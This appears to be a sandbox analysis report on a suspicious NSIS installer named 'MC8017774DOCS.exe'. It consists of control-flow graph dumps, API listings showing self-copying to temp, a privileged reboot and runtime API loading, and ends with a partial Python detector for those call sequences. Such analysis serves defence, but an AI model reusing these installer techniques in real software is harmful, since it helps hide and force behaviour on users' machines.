4797->4799 4800 4052e0 4798->4800 4801 405289 4798->4801 4802 40529f IsWindowVisible 4799->4802 4809 4052bf 4799->4809 4803 4052e5 CallWindowProcW 4800->4803 4804 40425a SendMessageW 4801->4804 4802->4800 4805 4052ac 
4802->4805 4806 405293 4803->4806 4804->4806 4811 404bc9 SendMessageW 4805->4811 4809->4803 4816 404c49 4809->4816 4812 404c28 SendMessageW 4811->4812 4813 404bec GetMessagePos ScreenToClient SendMessageW 4811->4813 4814 404c20 4812->4814 4813->4814 4815 404c25 4813->4815 4814->4809 4815->4812 4825 406297 lstrcpynW 4816->4825 4818 404c5c 4826 4061de wsprintfW 4818->4826 4820 404c66 4821 40140b 2 API calls 4820->4821 4822 404c6f 4821->4822 4827 406297 lstrcpynW 4822->4827 4824 404c76 4824->4800 4825->4818 4826->4820 4827->4824 5251 401cf3 5252 402c1f 17 API calls 5251->5252 5253 401cf9 IsWindow 5252->5253 5254 401a20 5253->5254 5255 401573 5256 401583 ShowWindow 5255->5256 5257 40158c 5255->5257 5256->5257 5258 402ac5 5257->5258 5259 40159a ShowWindow 5257->5259 5259->5258 5260 402df3 5261 402e05 SetTimer 5260->5261 5263 402e1e 5260->5263 5261->5263 5262 402e73 5263->5262 5264 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5263->5264 5264->5262 5265 4014f5 SetForegroundWindow 5266 402ac5 5265->5266 5267 402576 5268 402c41 17 API calls 5267->5268 5269 40257d 5268->5269 5272 405d8d GetFileAttributesW CreateFileW 5269->5272 5271 402589 5272->5271 4928 401b77 4929 401b84 4928->4929 4930 401bc8 4928->4930 4933 401c0d 4929->4933 4936 401b9b 4929->4936 4931 401bf2 GlobalAlloc 4930->4931 4932 401bcd 4930->4932 4935 4062b9 17 API calls 4931->4935 4946 4022f7 4932->4946 4949 406297 lstrcpynW 4932->4949 4934 4062b9 17 API calls 4933->4934 4933->4946 4938 4022f1 4934->4938 4935->4933 4947 406297 lstrcpynW 4936->4947 4942 4058fd MessageBoxIndirectW 4938->4942 4940 401bdf GlobalFree 4940->4946 4941 401baa 4948 406297 lstrcpynW 4941->4948 4942->4946 4944 401bb9 4950 406297 lstrcpynW 4944->4950 4947->4941 4948->4944 4949->4940 4950->4946 4951 4024f8 4952 402c81 17 API calls 4951->4952 4953 402502 4952->4953 4954 402c1f 17 API calls 4953->4954 4955 40250b 4954->4955 4956 40288b 4955->4956 4957 402533 RegEnumValueW 4955->4957 4958 402527 RegEnumKeyW 4955->4958 4959 402548 
4957->4959 4960 40254f RegCloseKey 4957->4960 4958->4960 4959->4960 4960->4956 4962 404c7b GetDlgItem GetDlgItem 4963 404ccd 7 API calls 4962->4963 5009 404ee6 4962->5009 4964 404d70 DeleteObject 4963->4964 4965 404d63 SendMessageW 4963->4965 4966 404d79 4964->4966 4965->4964 4967 404db0 4966->4967 4969 404d88 4966->4969 4972 40420e 18 API calls 4967->4972 4968 404fca 4973 405076 4968->4973 4979 40525e 4968->4979 4984 405023 SendMessageW 4968->4984 4970 4062b9 17 API calls 4969->4970 4974 404d92 SendMessageW SendMessageW 4970->4974 4971 404fab 4971->4968 4981 404fbc SendMessageW 4971->4981 4978 404dc4 4972->4978 4975 405080 SendMessageW 4973->4975 4976 405088 4973->4976 4974->4966 4975->4976 4986 4050a1 4976->4986 4987 40509a ImageList_Destroy 4976->4987 4994 4050b1 4976->4994 4977 404f46 4982 404bc9 5 API calls 4977->4982 4983 40420e 18 API calls 4978->4983 4980 404275 8 API calls 4979->4980 4985 40526c 4980->4985 4981->4968 4998 404f57 4982->4998 4999 404dd2 4983->4999 4984->4979 4989 405038 SendMessageW 4984->4989 4990 4050aa GlobalFree 4986->4990 4986->4994 4987->4986 4988 405220 4988->4979 4995 405232 ShowWindow GetDlgItem ShowWindow 4988->4995 4992 40504b 4989->4992 4990->4994 4991 404ea7 GetWindowLongW SetWindowLongW 4993 404ec0 4991->4993 5000 40505c SendMessageW 4992->5000 4996 404ec6 ShowWindow 4993->4996 4997 404ede 4993->4997 4994->4988 5007 404c49 4 API calls 4994->5007 5013 4050ec 4994->5013 4995->4979 5018 404243 SendMessageW 4996->5018 5019 404243 SendMessageW 4997->5019 4998->4971 4999->4991 5001 404ea1 4999->5001 5004 404e22 SendMessageW 4999->5004 5005 404e5e SendMessageW 4999->5005 5006 404e6f SendMessageW 4999->5006 5000->4973 5001->4991 5001->4993 5004->4999 5005->4999 5006->4999 5007->5013 5008 404ed9 5008->4979 5009->4968 5009->4971 5009->4977 5010 4051f6 InvalidateRect 5010->4988 5011 40520c 5010->5011 5020 404b84 5011->5020 5012 40511a SendMessageW 5014 405130 5012->5014 5013->5012 5013->5014 5014->5010 5015 405191 5014->5015 5017 4051a4 
SendMessageW SendMessageW 5014->5017 5015->5017 5017->5014 5018->5008 5019->5009 5023 404abb 5020->5023 5022 404b99 5022->4988 5024 404ad4 5023->5024 5025 4062b9 17 API calls 5024->5025 5026 404b38 5025->5026 5027 4062b9 17 API calls 5026->5027 5028 404b43 5027->5028 5029 4062b9 17 API calls 5028->5029 5030 404b59 lstrlenW wsprintfW SetDlgItemTextW 5029->5030 5030->5022 5273 40167b 5274 402c41 17 API calls 5273->5274 5275 401682 5274->5275 5276 402c41 17 API calls 5275->5276 5277 40168b 5276->5277 5278 402c41 17 API calls 5277->5278 5279 401694 MoveFileW 5278->5279 5280 4016a7 5279->5280 5286 4016a0 5279->5286 5282 4065da 2 API calls 5280->5282 5283 402250 5280->5283 5281 401423 24 API calls 5281->5283 5284 4016b6 5282->5284 5284->5283 5285 40605d 36 API calls 5284->5285 5285->5286 5286->5281 5287 401e7d 5288 402c41 17 API calls 5287->5288 5289 401e83 5288->5289 5290 402c41 17 API calls 5289->5290 5291 401e8c 5290->5291 5292 402c41 17 API calls 5291->5292 5293 401e95 5292->5293 5294 402c41 17 API calls 5293->5294 5295 401e9e 5294->5295 5296 401423 24 API calls 5295->5296 5297 401ea5 5296->5297 5304 4058c3 ShellExecuteExW 5297->5304 5299 401ee7 5301 40288b 5299->5301 5305 406722 WaitForSingleObject 5299->5305 5302 401f01 CloseHandle 5302->5301 5304->5299 5306 40673c 5305->5306 5307 40674e GetExitCodeProcess 5306->5307 5308 4066ad 2 API calls 5306->5308 5307->5302 5309 406743 WaitForSingleObject 5308->5309 5309->5306 5310 40437e lstrlenW 5311 40439d 5310->5311 5312 40439f WideCharToMultiByte 5310->5312 5311->5312 5313 4046ff 5314 40472b 5313->5314 5315 40473c 5313->5315 5374 4058e1 GetDlgItemTextW 5314->5374 5317 404748 GetDlgItem 5315->5317 5323 4047a7 5315->5323 5319 40475c 5317->5319 5318 404736 5321 40652b 5 API calls 5318->5321 5322 404770 SetWindowTextW 5319->5322 5326 405c17 4 API calls 5319->5326 5320 40488b 5371 404a3a 5320->5371 5376 4058e1 GetDlgItemTextW 5320->5376 5321->5315 5327 40420e 18 API calls 5322->5327 5323->5320 5328 4062b9 17 API calls 
[Serialized control-flow graph data (node → node edges, with the API names and "N API calls" counts the viewer shows per basic block) for the remaining functions of the NSIS stub in the 0x401000-0x4067xx range and of a loaded plugin DLL in the 0x6e9b1000-0x6e9b2dxx range. The rendered graph is not part of this page; the API calls recoverable from the edge list are: SHBrowseForFolderW/CoTaskMemFree, GetDiskFreeSpaceW/MulDiv, RegOpenKeyExW/RegQueryValueExW/RegEnumKeyW/RegDeleteKeyW/RegDeleteValueW/RegCloseKey, WritePrivateProfileStringW, CoCreateInstance, CLSIDFromString/StringFromGUID2, GetModuleHandleW/LoadLibraryW/LoadLibraryExW/GetProcAddress/FreeLibrary, GetFileAttributesW/CreateFileW/ReadFile/WriteFile/SetFilePointer/DeleteFileW/FindNextFileW/FindClose/SetFileAttributesW/SearchPathW, ExpandEnvironmentStringsW, GlobalAlloc/GlobalFree/GlobalSize/VirtualAlloc/VirtualFree, FindWindowExW/SendMessageTimeoutW/SendMessageW, MessageBoxIndirectW, CreateThread/CloseHandle, OpenClipboard/EmptyClipboard/SetClipboardData/CloseClipboard, PostQuitMessage, CreateFontIndirectW/BeginPaint/EndPaint and the usual lstrcpynW/lstrcatW/lstrcmpiW/wsprintfW string helpers.]

Control-flow Graph
[Rendered graph for the entry function at 0x40336c omitted; the interactive viewer colours each basic block as executed or not executed. The serialized block list covers, in order: SetErrorMode and GetVersion; comctl32 #17 and OleInitialize; SHGetFileInfoW and GetCommandLineW with CharNextW command-line parsing; GetTempPathW and GetWindowsDirectoryW with lstrcatW, then SetEnvironmentVariableW for TEMP and TMP; DeleteFileW; OleUninitialize with an ExitProcess path; the lstrcatW sequence appending "~nsu" and ".tmp" followed by lstrcmpiW and SetCurrentDirectoryW; DeleteFileW, CopyFileW and CloseHandle; and on the reboot path GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges and ExitWindowsEx before the final ExitProcess.]
APIs
• SetErrorMode.KERNELBASE ref: 0040338F
• GetVersion.KERNEL32 ref: 00403395
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
• OleInitialize.OLE32(00000000), ref: 0040340C
• SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
• GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000020,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
  • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
  • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
• DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
• OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
• ExitProcess.KERNEL32 ref: 00403701
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
• DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
• CopyFileW.KERNEL32(C:\Users\user\Desktop\MC8017774DOCS.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
• CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
• GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
• OpenProcessToken.ADVAPI32(00000000), ref: 00403827
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
• AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
• ExitProcess.KERNEL32 ref: 004038A7
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
• String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MC8017774DOCS.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
• API String ID: 3441113951-4081784568
• Opcode ID: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
• Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
• Opcode Fuzzy Hash: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
• Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

Control-flow Graph

control_flow_graph 139 404c7b-404cc7 GetDlgItem * 2 140 404ee8-404eef 139->140 141 404ccd-404d61 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 404ef1-404f01 140->142 143 404f03 140->143 144 404d70-404d77 DeleteObject 141->144 145 404d63-404d6e SendMessageW 141->145 146 404f06-404f0f 142->146 143->146 147 404d79-404d81 144->147 145->144 148 404f11-404f14 146->148 149 404f1a-404f20 146->149 150 404d83-404d86 147->150 151 404daa-404dae 147->151 148->149 155 404ffe-405005 148->155 152 404f22-404f29 149->152 153 404f2f-404f36 149->153 156 404d88 150->156 157 404d8b-404da8 call 4062b9 SendMessageW * 2 150->157 151->147 154 404db0-404ddc call 40420e * 2 151->154 152->153 152->155 159 404f38-404f3b 153->159 160 404fab-404fae 153->160 195 404de2-404de8 154->195 196 404ea7-404eba GetWindowLongW SetWindowLongW 154->196 162 405076-40507e 155->162 163 405007-40500d 155->163 156->157 157->151 168 404f46-404f5b call 404bc9 159->168 169 404f3d-404f44 159->169 160->155 164 404fb0-404fba 160->164 166 405080-405086 SendMessageW 162->166 167 405088-40508f 162->167 171 405013-40501d 163->171 172 40525e-405270 call 404275 163->172 174 404fca-404fd4 164->174 175 404fbc-404fc8 SendMessageW 164->175 166->167 176 405091-405098 167->176 177 4050c3-4050ca 167->177 168->160 194 404f5d-404f6e 168->194 169->160 169->168 171->172 180 405023-405032 SendMessageW 171->180 174->155 182 404fd6-404fe0 174->182 175->174 183 4050a1-4050a8 176->183 184 40509a-40509b ImageList_Destroy 176->184 187 405220-405227 177->187 188 4050d0-4050dc call 4011ef 177->188 180->172 189 405038-405049 SendMessageW 180->189 190 404ff1-404ffb 182->190 191 404fe2-404fef 182->191 192 4050b1-4050bd 183->192 193 4050aa-4050ab GlobalFree 183->193 184->183 187->172 200 405229-405230 187->200 213 4050ec-4050ef 188->213 214 4050de-4050e1 188->214 198 405053-405055 189->198 199 40504b-405051 189->199 190->155 191->155 192->177 193->192 194->160 202 404f70-404f72 194->202 203 404deb-404df2 195->203 201 404ec0-404ec4 196->201 205 405056-40506f call 401299 SendMessageW 198->205 199->198 199->205 200->172 206 405232-40525c ShowWindow GetDlgItem ShowWindow 200->206 207 404ec6-404ed9 ShowWindow call 404243 201->207 208 404ede-404ee6 call 404243 201->208 209 404f74-404f7b 202->209 210 404f85 202->210 211 404e88-404e9b 203->211 212 404df8-404e20 203->212 205->162 206->172 207->172 208->140 222 404f81-404f83 209->222 223 404f7d-404f7f 209->223 226 404f88-404fa4 call 40117d 210->226 211->203 217 404ea1-404ea5 211->217 224 404e22-404e58 SendMessageW 212->224 225 404e5a-404e5c 212->225 218 405130-405154 call 4011ef 213->218 219 4050f1-40510a call 4012e2 call 401299 213->219 227 4050e3 214->227 228 4050e4-4050e7 call 404c49 214->228 217->196 217->201 241 4051f6-40520a InvalidateRect 218->241 242 40515a 218->242 249 40511a-405129 SendMessageW 219->249 250 40510c-405112 219->250 222->226 223->226 224->211 229 404e5e-404e6d SendMessageW 225->229 230 404e6f-404e85 SendMessageW 225->230 226->160 227->228 228->213 229->211 230->211 241->187 244 40520c-40521b call 404b9c call 404b84 241->244 245 40515d-405168 242->245 244->187 246 40516a-405179 245->246 247 4051de-4051f0 245->247 251 40517b-405188 246->251 252 40518c-40518f 246->252 247->241 247->245 249->218 253 405114 250->253 254 405115-405118 250->254 251->252 256 405191-405194 252->256 257 405196-40519f 252->257 253->254 254->249 254->250 259 4051a4-4051dc SendMessageW * 2 256->259 257->259 260 4051a1 257->260 259->247 260->259
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404C93
• GetDlgItem.USER32(?,00000408), ref: 00404C9E
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
• LoadBitmapW.USER32(0000006E), ref: 00404CFB
• SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
• SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
• DeleteObject.GDI32(00000000), ref: 00404D71
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
• SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
• GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
• ShowWindow.USER32(?,00000005), ref: 00404ECB
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
• ImageList_Destroy.COMCTL32(?), ref: 0040509B
• GlobalFree.KERNEL32(?), ref: 004050AB
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
• SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
• InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
• ShowWindow.USER32(?,00000000), ref: 0040524A
• GetDlgItem.USER32(?,000003FE), ref: 00405255
• ShowWindow.USER32(00000000), ref: 0040525C
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018
• Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
• Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
• Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
• Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
APIs
  • Part of subcall function 6E9B121B: GlobalAlloc.KERNELBASE(00000040,?,6E9B123B,?,6E9B12DF,00000019,6E9B11BE,-000000A0), ref: 6E9B1225
• GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6E9B1C6F
• lstrcpyW.KERNEL32(00000008,?), ref: 6E9B1CB7
• lstrcpyW.KERNEL32(00000808,?), ref: 6E9B1CC1
• GlobalFree.KERNEL32(00000000), ref: 6E9B1CD4
• GlobalFree.KERNEL32(?), ref: 6E9B1DB6
• GlobalFree.KERNEL32(?), ref: 6E9B1DBB
• GlobalFree.KERNEL32(?), ref: 6E9B1DC0
• GlobalFree.KERNEL32(00000000), ref: 6E9B1FAA
• lstrcpyW.KERNEL32(?,?), ref: 6E9B2144
• GetModuleHandleW.KERNEL32(00000008), ref: 6E9B21B9
• LoadLibraryW.KERNEL32(00000008), ref: 6E9B21CA
• GetProcAddress.KERNEL32(?,?), ref: 6E9B2224
• lstrlenW.KERNEL32(00000808), ref: 6E9B223E
Memory Dump Source
• Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
• Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
Similarity
• API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
• String ID:
• API String ID: 245916457-0
• Opcode ID: 48dd54245d09a4261c868223c1183d0a1939ced8ba81105c79a7dd243f45b097
• Instruction ID: 2e7f43ae767abc3c8d87de518d181ce09957a8e2d580d06b0c6018ac38037ad4
• Opcode Fuzzy Hash: 48dd54245d09a4261c868223c1183d0a1939ced8ba81105c79a7dd243f45b097
• Instruction Fuzzy Hash: AD228671C2460ADEDB54CFEAC8946EBB7B8FF46305F10492AD1A5E3280D774DA898F50
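Two of the API listings above carry the sequences behind the overview signatures "Contains functionality to shutdown / reboot the system" and "Contains functionality to dynamically determine API calls": in the function at 0040372E-004038A7, LookupPrivilegeValueW(SeShutdownPrivilege) is followed by AdjustTokenPrivileges and ExitWindowsEx(00000002,80040002), and in the function at 6E9B1C6F-6E9B223E, GetModuleHandleW and LoadLibraryW are followed by GetProcAddress. The Python below is an added example, not code from Joe Sandbox or its IDA plugin: it parses listing lines of this exact shape, matches both sequences in call order, and decodes the ExitWindowsEx arguments with the public winuser.h/reason.h constants (00000002 is EWX_REBOOT; 80040002 is SHTDN_REASON_FLAG_PLANNED | SHTDN_REASON_MAJOR_APPLICATION | SHTDN_REASON_MINOR_INSTALLATION, a planned reboot for an application installation). The sample listings are copied from the report; the parser's assumption that no quoted path argument contains a comma is its own.

```python
"""Added example (not Joe Sandbox code): parse the bullet lines of a Joe Sandbox
"APIs" section and flag two sequences present in this report: a privileged reboot
(LookupPrivilegeValueW(SeShutdownPrivilege) -> AdjustTokenPrivileges -> ExitWindowsEx,
call sites 0040383C-00403884) and runtime API resolution
(GetModuleHandleW/LoadLibraryW -> GetProcAddress, call sites 6E9B21B9-6E9B2224)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One listing line, e.g. "• ExitWindowsEx.USER32(00000002,80040002), ref: 00403884".
# The argument list is optional ("• AdjustTokenPrivileges.ADVAPI32 ref: 0040385F")
# and a "Part of subcall function XXXX:" prefix may precede the API name.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str  # call-site address as printed in the listing


def parse_listing(text: str) -> List[ApiCall]:
    """Parse every API bullet line of a listing; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # Assumption: no quoted path in the listing contains a comma, so a
        # plain split is enough (true for every line in this report).
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref")))
    return calls


# ExitWindowsEx uFlags (winuser.h) and dwReason fields (reason.h).
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
REASON_FLAGS = {0x80000000: "SHTDN_REASON_FLAG_PLANNED",
                0x40000000: "SHTDN_REASON_FLAG_USER_DEFINED"}
REASON_MAJOR = {0x00000: "SHTDN_REASON_MAJOR_OTHER", 0x10000: "SHTDN_REASON_MAJOR_HARDWARE",
                0x20000: "SHTDN_REASON_MAJOR_OPERATINGSYSTEM",
                0x30000: "SHTDN_REASON_MAJOR_SOFTWARE", 0x40000: "SHTDN_REASON_MAJOR_APPLICATION",
                0x50000: "SHTDN_REASON_MAJOR_SYSTEM", 0x60000: "SHTDN_REASON_MAJOR_POWER"}
REASON_MINOR = {0x0: "SHTDN_REASON_MINOR_OTHER", 0x1: "SHTDN_REASON_MINOR_MAINTENANCE",
                0x2: "SHTDN_REASON_MINOR_INSTALLATION"}


def decode_exit_windows_ex(args: List[str]) -> Tuple[List[str], List[str]]:
    """Decode the (uFlags, dwReason) pair, which the sandbox prints in hex."""
    flags, reason = int(args[0], 16), int(args[1], 16)
    flag_names = [n for bit, n in EWX_FLAGS.items() if flags & bit] or ["EWX_LOGOFF"]
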